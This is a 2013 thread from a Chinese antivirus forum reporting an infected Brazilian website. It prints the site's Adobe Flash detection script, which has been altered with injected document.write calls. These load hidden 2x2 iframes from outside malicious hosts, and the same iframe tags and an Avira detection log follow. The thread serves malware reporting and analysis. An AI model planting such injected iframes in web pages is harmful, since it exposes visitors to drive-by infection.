查看: 1107|回复: 4
收起左侧

[已鉴定] http://claresbuffet.com.br/ 給力

[复制链接]
fireold
发表于 2013-7-14 19:08:30 | 显示全部楼层 |阅读模式
  1. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcs.html?j=1070562></iframe>');

  2. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1070562></iframe>');

  3. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://anormalbloodsugarlevels.com/ohos.html?j=1070562></iframe>');

  4. //v1.7
  5. // Flash Player Version Detection
  6. // Detect Client Browser type
  7. // Copyright 2005-2007 Adobe Systems Incorporated.  All rights reserved.
  8. var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
  9. var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
  10. var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;

  11. function ControlVersion() {
  12.     var version;
  13.     var axo;
  14.     var e;

  15.     // NOTE : new ActiveXObject(strFoo) throws an exception if strFoo isn't in the registry

  16.     try {
  17.         // version will be set for 7.X or greater players
  18.         axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
  19.         version = axo.GetVariable("$version");
  20.     } catch (e) {}

  21.     if (!version) {
  22.         try {
  23.             // version will be set for 6.X players only
  24.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");

  25.             // installed player is some revision of 6.0
  26.             // GetVariable("$version") crashes for versions 6.0.22 through 6.0.29,
  27.             // so we have to be careful.

  28.             // default to the first public version
  29.             version = "WIN 6,0,21,0";

  30.             // throws if AllowScripAccess does not exist (introduced in 6.0r47)         
  31.             axo.AllowScriptAccess = "always";

  32.             // safe to call for 6.0r47 or greater
  33.             version = axo.GetVariable("$version");

  34.         } catch (e) {}
  35.     }

  36.     if (!version) {
  37.         try {
  38.             // version will be set for 4.X or 5.X player
  39.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
  40.             version = axo.GetVariable("$version");
  41.         } catch (e) {}
  42.     }

  43.     if (!version) {
  44.         try {
  45.             // version will be set for 3.X player
  46.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
  47.             version = "WIN 3,0,18,0";
  48.         } catch (e) {}
  49.     }

  50.     if (!version) {
  51.         try {
  52.             // version will be set for 2.X player
  53.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
  54.             version = "WIN 2,0,0,11";
  55.         } catch (e) {
  56.             version = -1;
  57.         }
  58.     }

  59.     return version;
  60. }

  61. // JavaScript helper required to detect Flash Player PlugIn version information

  62. function GetSwfVer() {
  63.     // NS/Opera version >= 3 check for Flash plugin in plugin array
  64.     var flashVer = -1;

  65.     if (navigator.plugins != null && navigator.plugins.length > 0) {
  66.         if (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]) {
  67.             var swVer2 = navigator.plugins["Shockwave Flash 2.0"] ? " 2.0" : "";
  68.             var flashDescription = navigator.plugins["Shockwave Flash" + swVer2].description;
  69.             var descArray = flashDescription.split(" ");
  70.             var tempArrayMajor = descArray[2].split(".");
  71.             var versionMajor = tempArrayMajor[0];
  72.             var versionMinor = tempArrayMajor[1];
  73.             var versionRevision = descArray[3];
  74.             if (versionRevision == "") {
  75.                 versionRevision = descArray[4];
  76.             }
  77.             if (versionRevision[0] == "d") {
  78.                 versionRevision = versionRevision.substring(1);
  79.             } else if (versionRevision[0] == "r") {
  80.                 versionRevision = versionRevision.substring(1);
  81.                 if (versionRevision.indexOf("d") > 0) {
  82.                     versionRevision = versionRevision.substring(0, versionRevision.indexOf("d"));
  83.                 }
  84.             }
  85.             var flashVer = versionMajor + "." + versionMinor + "." + versionRevision;
  86.         }
  87.     }
  88.     // MSN/WebTV 2.6 supports Flash 4
  89.     else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.6") != -1) flashVer = 4;
  90.     // WebTV 2.5 supports Flash 3
  91.     else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.5") != -1) flashVer = 3;
  92.     // older WebTV supports Flash 2
  93.     else if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) flashVer = 2;
  94.     else if (isIE && isWin && !isOpera) {
  95.         flashVer = ControlVersion();
  96.     }
  97.     return flashVer;
  98. }

  99. // When called with reqMajorVer, reqMinorVer, reqRevision returns true if that version or greater is available

  100. function DetectFlashVer(reqMajorVer, reqMinorVer, reqRevision) {
  101.     versionStr = GetSwfVer();
  102.     if (versionStr == -1) {
  103.         return false;
  104.     } else if (versionStr != 0) {
  105.         if (isIE && isWin && !isOpera) {
  106.             // Given "WIN 2,0,0,11"
  107.             tempArray = versionStr.split(" "); // ["WIN", "2,0,0,11"]
  108.             tempString = tempArray[1]; // "2,0,0,11"
  109.             versionArray = tempString.split(","); // ['2', '0', '0', '11']
  110.         } else {
  111.             versionArray = versionStr.split(".");
  112.         }
  113.         var versionMajor = versionArray[0];
  114.         var versionMinor = versionArray[1];
  115.         var versionRevision = versionArray[2];

  116.         // is the major.revision >= requested major.revision AND the minor version >= requested minor
  117.         if (versionMajor > parseFloat(reqMajorVer)) {
  118.             return true;
  119.         } else if (versionMajor == parseFloat(reqMajorVer)) {
  120.             if (versionMinor > parseFloat(reqMinorVer)) return true;
  121.             else if (versionMinor == parseFloat(reqMinorVer)) {
  122.                 if (versionRevision >= parseFloat(reqRevision)) return true;
  123.             }
  124.         }
  125.         return false;
  126.     }
  127. }

  128. function AC_AddExtension(src, ext) {
  129.     if (src.indexOf('?') != -1) return src.replace(/\?/, ext + '?');
  130.     else return src + ext;
  131. }

  132. function AC_Generateobj(objAttrs, params, embedAttrs) {
  133.     var str = '';
  134.     if (isIE && isWin && !isOpera) {
  135.         str += '<object ';
  136.         for (var i in objAttrs) {
  137.             str += i + '="' + objAttrs[i] + '" ';
  138.         }
  139.         str += '>';
  140.         for (var i in params) {
  141.             str += '<param name="' + i + '" value="' + params[i] + '" /> ';
  142.         }
  143.         str += '</object>';
  144.     } else {
  145.         str += '<embed ';
  146.         for (var i in embedAttrs) {
  147.             str += i + '="' + embedAttrs[i] + '" ';
  148.         }
  149.         str += '> </embed>';
  150.     }

  151.     document.write(str);
  152. }

  153. function AC_FL_RunContent() {
  154.     var ret = AC_GetArgs(arguments, ".swf", "movie", "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000", "application/x-shockwave-flash");
  155.     AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
  156. }

  157. function AC_SW_RunContent() {
  158.     var ret = AC_GetArgs(arguments, ".dcr", "src", "clsid:166B1BCA-3F9C-11CF-8075-444553540000", null);
  159.     AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
  160. }

  161. function AC_GetArgs(args, ext, srcParamName, classid, mimeType) {
  162.     var ret = new Object();
  163.     ret.embedAttrs = new Object();
  164.     ret.params = new Object();
  165.     ret.objAttrs = new Object();
  166.     for (var i = 0; i < args.length; i = i + 2) {
  167.         var currArg = args[i].toLowerCase();

  168.         switch (currArg) {
  169.         case "classid":
  170.             break;
  171.         case "pluginspage":
  172.             ret.embedAttrs[args[i]] = args[i + 1];
  173.             break;
  174.         case "src":
  175.         case "movie":
  176.             args[i + 1] = AC_AddExtension(args[i + 1], ext);
  177.             ret.embedAttrs["src"] = args[i + 1];
  178.             ret.params[srcParamName] = args[i + 1];
  179.             break;
  180.         case "onafterupdate":
  181.         case "onbeforeupdate":
  182.         case "onblur":
  183.         case "oncellchange":
  184.         case "onclick":
  185.         case "ondblclick":
  186.         case "ondrag":
  187.         case "ondragend":
  188.         case "ondragenter":
  189.         case "ondragleave":
  190.         case "ondragover":
  191.         case "ondrop":
  192.         case "onfinish":
  193.         case "onfocus":
  194.         case "onhelp":
  195.         case "onmousedown":
  196.         case "onmouseup":
  197.         case "onmouseover":
  198.         case "onmousemove":
  199.         case "onmouseout":
  200.         case "onkeypress":
  201.         case "onkeydown":
  202.         case "onkeyup":
  203.         case "onload":
  204.         case "onlosecapture":
  205.         case "onpropertychange":
  206.         case "onreadystatechange":
  207.         case "onrowsdelete":
  208.         case "onrowenter":
  209.         case "onrowexit":
  210.         case "onrowsinserted":
  211.         case "onstart":
  212.         case "onscroll":
  213.         case "onbeforeeditfocus":
  214.         case "onactivate":
  215.         case "onbeforedeactivate":
  216.         case "ondeactivate":
  217.         case "type":
  218.         case "codebase":
  219.         case "id":
  220.             ret.objAttrs[args[i]] = args[i + 1];
  221.             break;
  222.         case "width":
  223.         case "height":
  224.         case "align":
  225.         case "vspace":
  226.         case "hspace":
  227.         case "class":
  228.         case "title":
  229.         case "accesskey":
  230.         case "name":
  231.         case "tabindex":
  232.             ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i + 1];
  233.             break;
  234.         default:
  235.             ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i + 1];
  236.         }
  237.     }
  238.     ret.objAttrs["classid"] = classid;
  239.     if (mimeType) ret.embedAttrs["type"] = mimeType;
  240.     return ret;
  241. }
  242. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html></iframe>');
复制代码

  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://anormalbloodsugarlevels.com/ohos.html?j=1070562>
  3. </iframe>
复制代码

  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://gabriellerosephotography.com/emas.html?j=1070562>
  3. </iframe>
复制代码

  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://khenpo.ru/ohcs.html?j=1070562>
  3. </iframe>
复制代码

  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://salvadorpostigo.com/hzws.html>
  3. </iframe>
复制代码


Avira
2013/7/14 下午 07:03 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\AC_RunActiveContent[1].js'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作:
      檔案會移動至 '57d21a75.qua' 名稱底下的隔離區目錄。.

2013/7/14 下午 07:03 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        795
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/7/14 下午 07:03 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\claresbuffet_com_br[1].htm'
      包含病毒或有害的程式 'HTML/Infected.WebPage.Gen3' [virus]
      已採取動作:
      檔案會移動至 '543e1578.qua' 名稱底下的隔離區目錄。.

2013/7/14 下午 07:03 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        795
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/7/14 下午 07:02 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\AC_RunActiveContent[1].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作:傳輸至掃描程式

2013/7/14 下午 07:02 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\AC_RunActiveContent[1].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作:拒絕存取

2013/7/14 下午 07:02 [Web Protection] 發現惡意程式碼
      從 URL "http://claresbuffet.com.br/AC_RunActiveContent.js" 存取資料時,
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作:已略過

2013/7/14 下午 07:02 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\claresbuffet_com_br[1].htm 中
      偵測到病毒或有害的程式 'HTML/Infected.WebPage.Gen3 [virus]'
      執行的動作:傳輸至掃描程式

2013/7/14 下午 07:02 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\claresbuffet_com_br[1].htm 中
      偵測到病毒或有害的程式 'HTML/Infected.WebPage.Gen3 [virus]'
      執行的動作:拒絕存取

2013/7/14 下午 07:02 [Web Protection] 發現惡意程式碼
      從 URL "http://claresbuffet.com.br/" 存取資料時,
      發現病毒或有害的程式 'HTML/Infected.WebPage.Gen3' [virus]。
      已採取動作:已略過


fs3.jpg
哀酱俏佳人
发表于 2013-7-14 19:11:35 | 显示全部楼层
好长
fireold
 楼主| 发表于 2013-7-14 19:23:42 | 显示全部楼层
哀酱俏佳人 发表于 2013-7-14 19:11
好长

的確太長了
会飞的猫
发表于 2013-7-14 23:04:17 | 显示全部楼层
哀酱俏佳人 发表于 2013-7-14 19:11
好长

想知道这毒网的代码是怎么解密出来的
另外“哀酱”说的是灰原吧
哀酱俏佳人
发表于 2013-7-14 23:21:34 | 显示全部楼层
会飞的猫 发表于 2013-7-14 23:04
想知道这毒网的代码是怎么解密出来的
另外“哀酱”说的是灰原吧

灰原哀嘛,用工具吖,看看应用区屁颠的帖子
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-3 18:20 , Processed in 0.133850 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表